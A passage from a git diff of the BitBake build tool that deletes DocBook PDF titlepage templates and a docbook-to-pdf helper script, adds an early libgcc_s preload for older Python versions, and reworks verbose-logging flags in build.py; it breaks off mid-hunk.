-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="partintro" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   text-align="center"
-	   font-size="&hsize5;"
-	   font-weight="bold"
-	   space-before="1em"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      text-align="center"
-	      font-size="&hsize2;"
-	      font-weight="bold"
-	      font-style="italic"
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="reference" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="division.title"
-	     param:node="ancestor-or-self::reference[1]"
-	     text-align="center"
-	     font-size="&hsize5;"
-	     space-before="&hsize5space;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"
-	      text-align="center"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsynopsisdiv" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsection" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect1" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect2" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="refsect3" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="dedication" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::dedication[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="preface" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::preface[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-      <corpauthor/>
-      <authorgroup/>
-      <author/>
-      <othercredit/>
-      <releaseinfo/>
-      <copyright/>
-      <legalnotice/>
-      <pubdate/>
-      <revision/>
-      <revhistory/>
-      <abstract/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="chapter" t:wrapper="fo:block"
-               font-family="{$title.fontset}">
-    <t:titlepage-content t:side="recto" margin-left="{$title.margin.left}">
-      <title t:named-template="component.title"
-	     param:node="ancestor-or-self::chapter[1]"
-	     font-size="&hsize5;"
-	     font-weight="bold"/>
-
-      <subtitle space-before="0.5em"
-		font-style="italic"
-		font-size="&hsize2;"
-		font-weight="bold"/>
-
-      <corpauthor  space-before="0.5em"
-	           space-after="0.5em"
-                   font-size="&hsize2;"/>
-
-      <authorgroup space-before="0.5em"
-	           space-after="0.5em"
-                   font-size="&hsize2;"/>
-
-      <author      space-before="0.5em"
-	           space-after="0.5em"
-                   font-size="&hsize2;"/>
-
-      <othercredit/>
-      <releaseinfo/>
-      <copyright/>
-      <legalnotice/>
-      <pubdate/>
-      <revision/>
-      <revhistory/>
-      <abstract/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="appendix" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::appendix[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-      <corpauthor/>
-      <authorgroup/>
-      <author/>
-      <othercredit/>
-      <releaseinfo/>
-      <copyright/>
-      <legalnotice/>
-      <pubdate/>
-      <revision/>
-      <revhistory/>
-      <abstract/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="section" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect1" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect2" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect3" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect4" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="sect5" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<t:titlepage t:element="simplesect" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-    <title
-	   margin-left="{$title.margin.left}"
-	   font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="bibliography" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::bibliography[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="bibliodiv" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title t:named-template="component.title"
-	     param:node="ancestor-or-self::bibliodiv[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize4;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="glossary" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::glossary[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="glossdiv" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title t:named-template="component.title"
-	     param:node="ancestor-or-self::glossdiv[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize4;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="index" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::index[1]"
-             param:pagewide="1"
-	     margin-left="0pt"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <!-- The indexdiv.title template is used so that manual and -->
-  <!-- automatically generated indexdiv titles get the same -->
-  <!-- formatting. -->
-
-  <t:titlepage t:element="indexdiv" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title t:force="1"
-	     t:named-template="indexdiv.title"
-	     param:title="title"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="setindex" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::setindex[1]"
-             param:pagewide="1"
-	     margin-left="0pt"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="colophon" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="component.title"
-	     param:node="ancestor-or-self::colophon[1]"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize5;"
-	     font-family="{$title.fontset}"
-	     font-weight="bold"/>
-      <subtitle
-		font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="table.of.contents" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'TableofContents'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.tables" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofTables'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.figures" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofFigures'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.examples" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofExamples'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.equations" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofEquations'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.procedures" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofProcedures'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-  <t:titlepage t:element="list.of.unknowns" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-      <title
-	     t:force="1"
-	     t:named-template="gentext"
-	     param:key="'ListofUnknown'"
-             space-before.minimum="1em"
-             space-before.optimum="1.5em"
-             space-before.maximum="2em"
-	     space-after="0.5em"
-	     margin-left="{$title.margin.left}"
-	     font-size="&hsize3;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    </t:titlepage-content>
-
-    <t:titlepage-content t:side="verso">
-    </t:titlepage-content>
-
-    <t:titlepage-separator>
-    </t:titlepage-separator>
-
-    <t:titlepage-before t:side="recto">
-    </t:titlepage-before>
-
-    <t:titlepage-before t:side="verso">
-    </t:titlepage-before>
-  </t:titlepage>
-
-<!-- ==================================================================== -->
-
-</t:templates>
diff --git a/bitbake/doc/tools/docbook-to-pdf b/bitbake/doc/tools/docbook-to-pdf
deleted file mode 100755
index 558ded9e0b..0000000000
--- a/bitbake/doc/tools/docbook-to-pdf
+++ /dev/null
@@ -1,51 +0,0 @@
-#!/bin/sh
-	
-if [ -z "$1" -o -z "$2" ]; then
-   echo "usage: [-v] $0 <docbook file> <templatedir>"
-   echo
-   echo "*NOTE* you need xsltproc, fop and nwalsh docbook stylesheets" 
-   echo "       installed for this to work!"
-   echo
-   exit 0
-fi
-
-FO=`echo $1 | sed s/.xml/.fo/` || exit 1
-PDF=`echo $1 | sed s/.xml/.pdf/` || exit 1
-TEMPLATEDIR=$2
-
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your localy installed XSL stylesheets.
-XSL_BASE_URI="http://docbook.sourceforge.net/release/xsl/current"
-
-# Creates a temporary XSL stylesheet based on titlepage.xsl
-xsltproc -o /tmp/titlepage.xsl                                           \
-	 --xinclude                                                      \
-         $XSL_BASE_URI/template/titlepage.xsl \
-         $TEMPLATEDIR/titlepage.templates.xml || exit 1
-
-# Creates the file needed for FOP
-xsltproc --xinclude                    \
-	 --stringparam hyphenate false \
-	 --stringparam formal.title.placement "figure after" \
-	 --stringparam ulink.show 1 \
-         --stringparam  body.font.master  9 \
-         --stringparam  title.font.master  11 \
-         --stringparam draft.watermark.image "$TEMPLATEDIR/draft.png" \
-         --stringparam  chapter.autolabel 1 \
-         --stringparam  appendix.autolabel A \
-         --stringparam  section.autolabel 1 \
-         --stringparam  section.label.includes.component.label 1 \
-         --output $FO               \
-         $TEMPLATEDIR/db-pdf.xsl    \
-	 $1                 || exit 1
-
-# Invokes the Java version of FOP.  Uses the additional configuration file common/fop-config.xml
-fop -c $TEMPLATEDIR/fop-config.xml -fo $FO -pdf $PDF       || exit 1
-
-rm -f $FO
-rm -f  /tmp/titlepage.xsl
-
-echo
-echo " #### Success! $PDF ready. ####"
-echo
diff --git a/bitbake/lib/bb/__init__.py b/bitbake/lib/bb/__init__.py
index b96466e654..ba8039497f 100644
--- a/bitbake/lib/bb/__init__.py
+++ b/bitbake/lib/bb/__init__.py
@@ -15,6 +15,13 @@ import sys
 if sys.version_info < (3, 5, 0):
     raise RuntimeError("Sorry, python 3.5.0 or later is required for this version of bitbake")
 
+if sys.version_info < (3, 10, 0):
+    # With python 3.8 and 3.9, we see errors of "libgcc_s.so.1 must be installed for pthread_cancel to work"
+    # https://stackoverflow.com/questions/64797838/libgcc-s-so-1-must-be-installed-for-pthread-cancel-to-work
+    # https://bugs.ams1.psf.io/issue42888
+    # so ensure libgcc_s is loaded early on
+    import ctypes
+    libgcc_s = ctypes.CDLL('libgcc_s.so.1')
 
 class BBHandledException(Exception):
     """
@@ -47,7 +54,7 @@ class BBLogger(Logger):
         if not bb.event.worker_pid:
             if self.name in bb.msg.loggerDefaultDomains and loglevel > (bb.msg.loggerDefaultDomains[self.name]):
                 return
-            if loglevel > bb.msg.loggerDefaultLogLevel:
+            if loglevel < bb.msg.loggerDefaultLogLevel:
                 return
         return self.log(loglevel, msg, *args, **kwargs)
 
diff --git a/bitbake/lib/bb/build.py b/bitbake/lib/bb/build.py
index 23b6ee455f..aaada8a18b 100644
--- a/bitbake/lib/bb/build.py
+++ b/bitbake/lib/bb/build.py
@@ -27,6 +27,9 @@ from bb import data, event, utils
 bblogger = logging.getLogger('BitBake')
 logger = logging.getLogger('BitBake.Build')
 
+verboseShellLogging = False
+verboseStdoutLogging = False
+
 __mtime_cache = {}
 
 def cached_mtime_noerror(f):
@@ -290,8 +293,8 @@ def exec_func_python(func, d, runfile, cwd=None):
         lineno = int(d.getVarFlag(func, "lineno", False))
         bb.methodpool.insert_method(func, text, fn, lineno - 1)
 
-        comp = utils.better_compile(code, func, "exec_python_func() autogenerated")
-        utils.better_exec(comp, {"d": d}, code, "exec_python_func() autogenerated")
+        comp = utils.better_compile(code, func, "exec_func_python() autogenerated")
+        utils.better_exec(comp, {"d": d}, code, "exec_func_python() autogenerated")
     finally:
         bb.debug(2, "Python function %s finished" % func)
 
@@ -371,7 +374,7 @@ def exec_func_shell(func, d, runfile, cwd=None):
 
         bb.data.emit_func(func, script, d)
 
-        if bb.msg.loggerVerboseLogs:
+        if verboseShellLogging or bb.utils.to_boolean(d.getVar("BB_VERBOSE_LOGS", False)):
             script.write("set -x\n")
         if cwd:
             script.write("cd '%s'\n" % cwd)
@@ -391,7 +394,7 @@ exit $ret
         if fakerootcmd:
             cmd = [fakerootcmd, runfile]
 
-    if bb.msg.loggerDefaultVerbose:
+    if verboseStdoutLogging:
         logfile = LogTee(logger, StdoutNoopContextManager())
     else:
         logfile = StdoutNoopContextManager()
@@ -587,11 +590,15 @@ def _exec_task(fn, task, d, quieterr):
         except bb.BBHandledException:
             event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata)
             return 1
-        except Exception as exc:
